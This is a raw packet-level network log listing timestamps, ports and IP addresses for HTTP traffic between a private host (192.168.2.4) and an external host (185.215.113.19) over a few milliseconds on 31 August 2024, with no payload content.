Aug 31, 2024 22:41:57.364079952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.364090919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.364095926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364111900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364134073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364151955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364180088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364197969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364216089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364234924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364386082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364401102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364423990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364445925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364458084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364478111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364502907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364525080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364547014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364567041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364588976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364618063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364629984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364645004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364669085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364690065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364703894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364721060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364743948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364758015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364779949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364795923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364821911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364845991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364866018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364880085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364902973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364918947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364939928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364960909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364980936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.364999056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365012884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365036964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365051031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365071058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365092993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365119934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365134954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365156889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365175962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365191936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365215063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365231037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365252018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365266085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365289927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365310907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365326881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365350962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365374088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365394115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365411043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365433931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365456104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365474939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365494013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365514040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365534067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365550995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365573883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365588903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365609884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365631104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365653038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365677118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365696907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365714073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365736961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365758896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365773916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365792036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365813017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365832090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365854025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365863085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365881920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365906000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365926027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365943909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365967989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.365988970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366147995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366167068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366190910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366211891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366230011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366245985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366266012 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366286039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366303921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366323948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366333008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366359949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366379023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366394997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366419077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366439104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366457939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366477966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366499901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366513014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366535902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366555929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366575003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366592884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366607904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366630077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366646051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366667986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366688967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366709948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366729021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366749048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366765976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366782904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366806030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366827011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366839886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366857052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366878986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366893053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366914988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366929054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366954088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366978884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.366993904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367017984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367039919 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367053032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367074966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367089987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367111921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367125034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367146969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367163897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367182016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367202044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367221117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367243052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367263079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367281914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367306948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367316961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367340088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367357016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367376089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367394924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367403984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367429972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367445946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367460966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367480040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367505074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367521048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367548943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367566109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367588043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367609024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367626905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367640972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367664099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367681980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367700100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367719889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367738008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367754936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367779970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367798090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367818117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367837906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367855072 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367855072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367870092 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367877007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367881060 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367892027 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367893934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367902994 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367913008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367913961 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367924929 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367932081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367934942 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367945910 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367950916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367955923 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367966890 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367973089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367976904 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367988110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.367988110 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.367999077 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368006945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368010998 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368021965 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368024111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368032932 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368042946 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368047953 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368052006 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368052959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368062973 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368067026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368072987 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368083954 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368091106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368094921 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368105888 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368108034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368117094 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368129969 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368134022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368141890 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368151903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368153095 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368158102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368168116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368169069 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368180037 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368187904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368191004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368201971 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368208885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368211985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368222952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368222952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368232965 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368237972 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368242025 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368243933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368252993 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368257999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368263960 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368274927 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368278980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368285894 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368295908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368298054 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368310928 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368314028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368324995 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368335962 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368346930 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368349075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368359089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368370056 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368381023 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368381977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368387938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368391991 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368402958 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368412971 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368412971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368422985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368433952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368436098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368444920 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368454933 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368460894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368467093 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368469954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368478060 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368491888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368506908 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368513107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368519068 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368530035 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368534088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368540049 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368544102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368551016 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368561029 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368563890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368571997 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368583918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368583918 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368594885 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368602991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368607044 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368619919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368621111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368630886 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368643045 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368643999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368653059 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368664026 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368665934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368681908 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368681908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368693113 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368699074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368704081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368714094 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368725061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368725061 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368736029 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368736029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368746996 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368757010 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368767977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368768930 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368784904 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368784904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368796110 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368805885 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.368809938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368834972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368855953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368889093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368901968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368928909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368946075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368968010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.368987083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.369004965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.369035006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.369045973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.369061947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.369081974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.369092941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.369115114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.369138002 CEST	49732	80	192.168.2.4	185.215.113.19
